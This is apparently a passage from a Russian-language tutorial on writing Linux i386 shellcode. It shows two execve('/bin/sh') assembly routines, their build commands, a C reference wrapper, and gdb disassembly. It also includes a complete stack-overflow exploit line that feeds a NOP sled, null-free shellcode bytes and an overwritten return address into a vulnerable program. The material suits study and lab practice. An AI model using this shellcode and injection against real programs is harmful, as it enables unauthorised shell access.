shellcode3.asm
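section .text
global _start

;-----------------------------------------------------------------------
; _start: execve("//bin/sh", NULL, NULL) through the i386 int 0x80 gate.
; ABI:   Linux i386 system call: eax = number, ebx/ecx/edx = args 1..3
; In:    none
; Out:   does not return on success (the process image is replaced)
; Note:  the path is built on the stack, so no data section is needed.
;-----------------------------------------------------------------------
_start:
        xor     eax, eax                ; eax = 0; reused below as the NUL and the NULL args
        push    eax                     ; string terminator
        push    0x68732f6e              ; "n/sh" (little-endian)
        push    0x69622f2f              ; "//bi" -> stack now reads "//bin/sh\0"
        mov     ebx, esp                ; ebx = path
        mov     ecx, eax                ; ecx = argv = NULL
        mov     edx, eax                ; edx = envp = NULL
        mov     al, 0xb                 ; eax = __NR_execve (11); upper bytes already zero
        int     0x80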
$ nasm -f elf shellcode3.asm
$ ld -m elf_i386 shellcode3.o -o shellcode3
./vuln_stack ∖
$(python -c 'print "∖x90"*40 + ∖
"∖x31∖xc0∖x50∖x68∖x6e∖x2f∖x73∖x68"∖
"∖x68∖x2f∖x2f∖x62∖x69∖x89∖xe3∖x89"∖
"∖xc1∖x89∖xc2∖xb0∖x0b∖xcd∖x80" + ∖
"A"*49 + "∖xf0∖xd5∖xff∖xff"')
objdump -M intel -d shellcode3
shellcode1.asm
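section .text
global _start

;-----------------------------------------------------------------------
; _start: execve("/bin/sh", NULL, NULL) through the i386 int 0x80 gate.
; ABI:   Linux i386 system call: eax = number, ebx/ecx/edx = args 1..3
; In:    none
; Out:   does not return on success (the process image is replaced)
;-----------------------------------------------------------------------
_start:
        push    0x0068732f              ; "/sh\0" (little-endian; high byte is the terminator)
        push    0x6e69622f              ; "/bin"  -> stack now reads "/bin/sh\0"
        mov     ebx, esp                ; ebx = path
        mov     ecx, 0                  ; ecx = argv = NULL
        mov     edx, 0                  ; edx = envp = NULL
        mov     eax, 0xb                ; eax = __NR_execve (11)
        int     0x80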
$ nasm -f elf shellcode1.asm
$ ld -m elf_i386 shellcode1.o -o shellcode1
python -c 'print(" ".join(["{:02x}".format(ord(c))
for c in "/bin/sh"]))'
objdump -M intel -d shellcode1
Обертка на C
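#include <unistd.h>

/*
 * Reference wrapper: calls execve("/bin/sh", NULL, NULL) through libc so that
 * the register setup of the execve system call can be inspected in gdb
 * (the build line below uses -m32 --static).  argc/argv are unused.
 */
int main(int argc, char *argv[])
{
    execve("/bin/sh", 0, 0);    /* argv and envp both NULL */
    return 0;                   /* reached only if execve fails */
}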
gcc -m32 -g --static execve_sh.c -o execve_sh
gdb ./execve_sh
(gdb) set disassembly-flavor intel
(gdb) disassemble execve
Dump of assembler code for function execve:
0x0806bf70 <+0>: push ebx
0x0806bf71 <+1>: mov edx,DWORD PTR [esp+0x10]
0x0806bf75 <+5>: mov ecx,DWORD PTR [esp+0xc]
0x0806bf79 <+9>: mov ebx,DWORD PTR [esp+0x8]
0x0806bf7d <+13>: mov eax,0xb
0xb — номер системного вызова execve